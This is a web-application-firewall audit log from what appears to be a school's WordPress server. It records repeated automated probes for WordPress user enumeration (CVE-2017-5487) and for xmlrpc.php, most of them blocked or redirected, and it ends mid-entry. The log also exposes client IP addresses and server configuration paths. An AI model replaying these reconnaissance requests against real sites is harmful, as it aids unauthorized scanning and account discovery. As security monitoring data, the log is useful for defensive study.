proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444910409452 6554 (- - -) Stopwatch2: 1747444910409452 6554; combined=4739, p1=595, p2=3902, p3=38, p4=43, p5=96, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209c774a-Z-- --6570a441-A-- [17/May/2025:08:21:55 +0700] aCfks-m4kjNN-hEbWjJA7AAAAEQ 103.236.140.4 43800 103.236.140.4 8181 --6570a441-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6570a441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6570a441-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444915238577 2275 (- - -) Stopwatch2: 1747444915238577 2275; combined=1032, p1=347, p2=654, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6570a441-Z-- --8328df20-A-- [17/May/2025:08:22:02 +0700] aCfkuum4kjNN-hEbWjJA7gAAAEc 103.236.140.4 43806 103.236.140.4 8181 --8328df20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8328df20-C-- demo.sayHello --8328df20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8328df20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444922902188 6083 (- - -) Stopwatch2: 1747444922902188 6083; combined=4438, p1=532, p2=3639, p3=31, p4=34, p5=115, sr=72, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8328df20-Z-- --3344bd23-A-- [17/May/2025:08:22:04 +0700] aCfkvHyxdQCiyU1ENFcnkwAAABU 103.236.140.4 43820 103.236.140.4 8181 --3344bd23-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3344bd23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3344bd23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444924978333 2646 (- - -) Stopwatch2: 1747444924978333 2646; combined=1235, p1=394, p2=813, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3344bd23-Z-- --24c6a660-A-- [17/May/2025:08:22:14 +0700] aCfkxum4kjNN-hEbWjJA8QAAAE0 103.236.140.4 43824 103.236.140.4 8181 --24c6a660-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --24c6a660-C-- demo.sayHello --24c6a660-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c6a660-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444934510058 4854 (- - -) Stopwatch2: 1747444934510058 4854; combined=3737, p1=467, p2=3071, p3=24, p4=27, p5=88, sr=89, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24c6a660-Z-- --03e81736-A-- [17/May/2025:08:22:15 +0700] aCfkx-m4kjNN-hEbWjJA8gAAAE4 103.236.140.4 43826 103.236.140.4 8181 --03e81736-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03e81736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e81736-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444935418538 1981 (- - -) Stopwatch2: 1747444935418538 1981; combined=950, p1=319, p2=604, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e81736-Z-- --245d8237-A-- [17/May/2025:08:22:19 +0700] aCfky3yxdQCiyU1ENFcnlQAAAAA 103.236.140.4 43834 103.236.140.4 8181 --245d8237-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --245d8237-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --245d8237-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444939898477 2566 (- - -) Stopwatch2: 1747444939898477 2566; combined=1174, p1=399, p2=747, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --245d8237-Z-- --cb8a5d2e-A-- [17/May/2025:08:22:22 +0700] aCfkznyxdQCiyU1ENFcnlwAAAAI 103.236.140.4 43838 103.236.140.4 8181 --cb8a5d2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb8a5d2e-C-- demo.sayHello --cb8a5d2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb8a5d2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444942399481 5526 (- - -) Stopwatch2: 1747444942399481 5526; combined=4136, p1=512, p2=3404, p3=29, p4=34, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb8a5d2e-Z-- --9849e12f-A-- [17/May/2025:08:22:29 +0700] aCfk1XyxdQCiyU1ENFcnmQAAAAU 103.236.140.4 43844 103.236.140.4 8181 --9849e12f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9849e12f-C-- demo.sayHello --9849e12f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9849e12f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444949106109 6594 (- - -) Stopwatch2: 1747444949106109 6594; combined=4807, p1=640, p2=3790, p3=40, p4=42, p5=202, sr=82, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9849e12f-Z-- --d559fd5c-A-- [17/May/2025:08:22:39 +0700] aCfk33yxdQCiyU1ENFcnmwAAAAY 103.236.140.4 43848 103.236.140.4 8181 --d559fd5c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d559fd5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d559fd5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444959841439 3278 (- - -) Stopwatch2: 1747444959841439 3278; combined=1394, p1=476, p2=886, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d559fd5c-Z-- --58a05823-A-- [17/May/2025:08:22:45 +0700] aCfk5QTOsBn9MSWb6WJulgAAAIw 103.236.140.4 43896 103.236.140.4 8181 --58a05823-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58a05823-C-- demo.sayHello --58a05823-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58a05823-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444965291190 5562 (- - -) Stopwatch2: 1747444965291190 5562; combined=4261, p1=504, p2=3527, p3=31, p4=38, p5=95, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58a05823-Z-- --aae8ca3c-A-- [17/May/2025:08:23:15 +0700] aCflAxKi5m5upc8uMd6iKgAAAMQ 103.236.140.4 43900 103.236.140.4 8181 --aae8ca3c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aae8ca3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aae8ca3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444995129005 3378 (- - -) Stopwatch2: 1747444995129005 3378; combined=1506, p1=512, p2=953, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aae8ca3c-Z-- --380f3d45-A-- [17/May/2025:08:23:22 +0700] aCflChKi5m5upc8uMd6iKwAAAMM 103.236.140.4 43904 103.236.140.4 8181 --380f3d45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --380f3d45-C-- demo.sayHello --380f3d45-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --380f3d45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445002232813 5476 (- - -) Stopwatch2: 1747445002232813 5476; combined=4087, p1=545, p2=3329, p3=29, p4=31, p5=90, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --380f3d45-Z-- --da73bc68-A-- [17/May/2025:08:23:47 +0700] aCflIxKi5m5upc8uMd6iLAAAAMU 103.236.140.4 43908 103.236.140.4 8181 --da73bc68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da73bc68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da73bc68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445027695370 2837 (- - -) Stopwatch2: 1747445027695370 2837; combined=1181, p1=386, p2=770, p3=0, p4=0, p5=25, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da73bc68-Z-- --ea629164-A-- [17/May/2025:08:23:55 +0700] aCflK3yxdQCiyU1ENFcnnQAAAAo 103.236.140.4 43912 103.236.140.4 8181 --ea629164-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ea629164-C-- demo.sayHello --ea629164-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea629164-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445035307958 6632 (- - -) Stopwatch2: 1747445035307958 6632; combined=4896, p1=638, p2=3920, p3=39, p4=42, p5=145, sr=78, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea629164-Z-- --e71e8544-A-- [17/May/2025:08:24:08 +0700] aCflOATOsBn9MSWb6WJumwAAAJQ 103.236.140.4 43918 103.236.140.4 8181 --e71e8544-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e71e8544-C-- demo.sayHello --e71e8544-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e71e8544-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445048473569 4803 (- - -) Stopwatch2: 1747445048473569 4803; combined=3717, p1=454, p2=3060, p3=26, p4=25, p5=90, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e71e8544-Z-- --e8b51d37-A-- [17/May/2025:08:24:28 +0700] aCflTHyxdQCiyU1ENFcnnwAAAAw 103.236.140.4 43922 103.236.140.4 8181 --e8b51d37-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8b51d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8b51d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445068273452 2872 (- - -) Stopwatch2: 1747445068273452 2872; combined=1292, p1=419, p2=843, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8b51d37-Z-- --77c6a805-A-- [17/May/2025:08:24:34 +0700] aCflUgTOsBn9MSWb6WJunQAAAJY 103.236.140.4 43926 103.236.140.4 8181 --77c6a805-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77c6a805-C-- demo.sayHello --77c6a805-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77c6a805-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line 